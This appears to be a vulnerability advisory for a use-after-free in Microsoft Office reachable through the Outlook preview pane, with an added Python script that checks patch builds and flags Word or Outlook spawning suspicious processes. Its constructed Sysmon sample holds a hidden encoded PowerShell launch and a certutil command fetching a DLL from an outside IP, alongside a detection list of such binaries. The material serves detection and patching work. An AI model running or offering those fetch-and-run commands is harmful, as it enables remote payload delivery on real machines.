CVE-2026-40361

Microsoft · Office

A use-after-free vulnerability in Microsoft Office allows unauthorized attackers to achieve local code execution.

Executive summary

A high-severity (CVSS 8.4) use-after-free vulnerability in Microsoft Office lets an unauthenticated attacker run arbitrary code on the victim's machine by getting Office to parse attacker-supplied content. Because the affected code is shared with Outlook, rendering a message in the Preview Pane may be enough to trigger it, which makes a zero-click path via email preview possible.

Vulnerability

This is a use-after-free in a DLL shared by Word and Outlook: an object is freed while a reference to it is still in use, and a later access through that dangling reference operates on whatever now occupies the freed memory. If the attacker can control the content that lands in that allocation (for example by shaping the document or message Office is parsing), the stale access can be turned into control over execution. No authentication is required; the attacker only needs the victim's Office to process crafted content, and a message rendered in the Outlook Preview Pane is one way to achieve that without the user opening anything. The vendor summary above describes the result as local code execution while this section calls it remote code execution; both are describing the same thing from different angles, since the content is delivered remotely but is parsed, and the code executed, on the victim's own machine, in the context of the logged-in user.

Business impact

The vulnerability carries a CVSS base score of 8.4, which is High severity. A score of 8.4 with full confidentiality, integrity and availability impact corresponds to a local attack vector with low complexity, no privileges and no user interaction required, consistent with the preview-pane scenario. Successful exploitation gives the attacker arbitrary code execution with the privileges of the user running Office; on a workstation where that user is a local administrator, or with a follow-on privilege escalation, this becomes full system compromise. Likely follow-on activity includes data exfiltration, ransomware deployment, and access to the mailbox and other sensitive internal communications the user can read.

Remediation

Immediate Action: Apply the security updates provided by Microsoft as soon as possible, and verify rather than assume: confirm that every Office installation reports a build at or above the fixed build listed for its update channel in the vendor advisory, since Click-to-Run channels and MSI installs receive different build numbers.

Proactive Monitoring: Office does not keep "access logs" in any useful sense; look instead at endpoint telemetry (EDR, Sysmon Event ID 1, or Windows Security event 4688 with command-line auditing enabled) for OUTLOOK.EXE or WINWORD.EXE appearing as the parent of processes an email or document should never launch, such as cmd.exe, powershell.exe, wscript.exe, mshta.exe, rundll32.exe or certutil.exe. Unexpected crashes of those two processes (Application log, Event ID 1000) around the same time are a weaker but useful signal of failed exploitation attempts.

Compensating Controls: Turn off the Reading Pane in Outlook (View > Reading Pane > Off) as a temporary measure to remove the zero-click preview vector. This only narrows the attack surface: a user who opens the message or the attachment still triggers the vulnerable code path, so it is a stopgap until the update is deployed, not a substitute for it.
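The first two remediation items above (verify the build, hunt for Office processes spawning something they should not) are the kind of thing that gets done once by hand and then forgotten. Below is an added example, not part of the advisory and not Microsoft tooling, that does both over inputs you supply: a build-number comparison against the fixed build you read off the vendor advisory (the advisory's own build numbers are deliberately not reproduced here, and the ones in the code are constructed placeholders), and a process-tree check run over constructed, rendered Sysmon Event ID 1 records in the "Key: Value" form Sysmon writes to the event log. The sample events, IP address and encoded command line are all fabricated for illustration.

```python
"""Triage helpers for this advisory: a patch-level check and a process-tree
detection over constructed Sysmon-style process-creation records.

Added example, not part of the advisory. Pass the minimum fixed build for
your Office update channel into is_patched() from the vendor bulletin; the
build numbers and log sample below are constructed placeholders.
"""
from __future__ import annotations

from dataclasses import dataclass

# Office executables that render mail and document content through the shared
# DLL. Compared case-insensitively on the image basename.
OFFICE_PARENTS = {"winword.exe", "outlook.exe"}

# Children an email preview or document should never need to launch. Any one
# of these directly under an Office parent is worth a look on its own.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
    "bitsadmin.exe", "msiexec.exe",
}


def parse_build(version: str) -> tuple[int, ...]:
    """'16.0.18025.20160' -> (16, 0, 18025, 20160); shorter strings are zero-padded
    so that '16.0' compares as (16, 0, 0, 0)."""
    parts = version.strip().split(".")
    if not 1 <= len(parts) <= 4 or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a dotted Office build number: {version!r}")
    return tuple([int(p) for p in parts] + [0] * (4 - len(parts)))


def is_patched(installed: str, minimum_fixed: str) -> bool:
    """True when the installed build is at or above the advisory's fixed build."""
    return parse_build(installed) >= parse_build(minimum_fixed)


@dataclass(frozen=True)
class ProcessEvent:
    utc_time: str
    image: str
    command_line: str
    parent_image: str


def parse_sysmon_text(blob: str) -> list[ProcessEvent]:
    """Parse rendered Sysmon Event ID 1 messages ('Key: Value' lines, records
    separated by a line containing only '---') into ProcessEvent objects."""
    events = []
    for record in blob.split("\n---\n"):
        fields = {}
        for line in record.strip().splitlines():
            key, sep, value = line.partition(": ")
            if sep:
                fields[key.strip()] = value.strip()
        if "Image" in fields and "ParentImage" in fields:
            events.append(ProcessEvent(
                utc_time=fields.get("UtcTime", ""),
                image=fields["Image"],
                command_line=fields.get("CommandLine", ""),
                parent_image=fields["ParentImage"],
            ))
    return events


def image_name(path: str) -> str:
    """Lower-cased basename of a Windows image path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def office_spawned_suspicious(events: list[ProcessEvent]) -> list[ProcessEvent]:
    """Events where Word or Outlook is the direct parent of a living-off-the-land
    binary. Whatever the exploit does after the use-after-free, it usually has
    to start a process, and the parent/child pair is the cheapest place to see it."""
    return [
        e for e in events
        if image_name(e.parent_image) in OFFICE_PARENTS
        and image_name(e.image) in SUSPICIOUS_CHILDREN
    ]


# Constructed sample in the shape of rendered Sysmon Event ID 1 messages.
# Record 1 (Outlook launching Word to open an attachment) is benign and must
# not fire; records 2 and 3 should; record 4 has a non-Office parent.
SAMPLE_SYSMON_EVENTS = r"""UtcTime: 2026-04-14 09:12:03.117
Image: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
CommandLine: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n
ParentImage: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
---
UtcTime: 2026-04-14 09:12:09.402
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A
ParentImage: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
---
UtcTime: 2026-04-14 09:13:41.050
Image: C:\Windows\System32\cmd.exe
CommandLine: cmd.exe /c certutil -urlcache -f http://203.0.113.7/a.dll %TEMP%\a.dll
ParentImage: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
---
UtcTime: 2026-04-14 09:15:22.910
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: powershell.exe -File C:\Scripts\inventory.ps1
ParentImage: C:\Windows\explorer.exe
"""


def triage(installed_build: str, minimum_fixed_build: str, sysmon_text: str) -> dict:
    """Run both checks and return a small report."""
    hits = office_spawned_suspicious(parse_sysmon_text(sysmon_text))
    return {
        "patched": is_patched(installed_build, minimum_fixed_build),
        "suspicious_children": [
            (e.utc_time, image_name(e.parent_image), image_name(e.image)) for e in hits
        ],
    }


if __name__ == "__main__":
    # Placeholder builds; substitute the installed build and the advisory's fixed build.
    report = triage("16.0.17928.20216", "16.0.18025.20160", SAMPLE_SYSMON_EVENTS)
    print("patched:", report["patched"])
    for when, parent, child in report["suspicious_children"]:
        print(f"{when}  {parent} -> {child}")
```

The parent/child rule is intentionally narrow so it stays quiet on a normal fleet; Outlook launching Word, or Word launching the print spooler helper, does not match. It will miss an exploit that injects into an existing process instead of spawning one, so treat it as the first hunt, not the only one, and widen SUSPICIOUS_CHILDREN with whatever your EDR shows Office launching under attack.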

Exploitation status

Public Exploit Available: True

Analyst recommendation

With a public exploit available and a use-after-free that can be reached from a mail preview, this is a patch-now item. Prioritize the update across every workstation and server that runs an affected Office build, including RDS and other shared session hosts where one unpatched installation serves many users, and confirm the deployed build against the vendor advisory rather than relying on update-job status alone.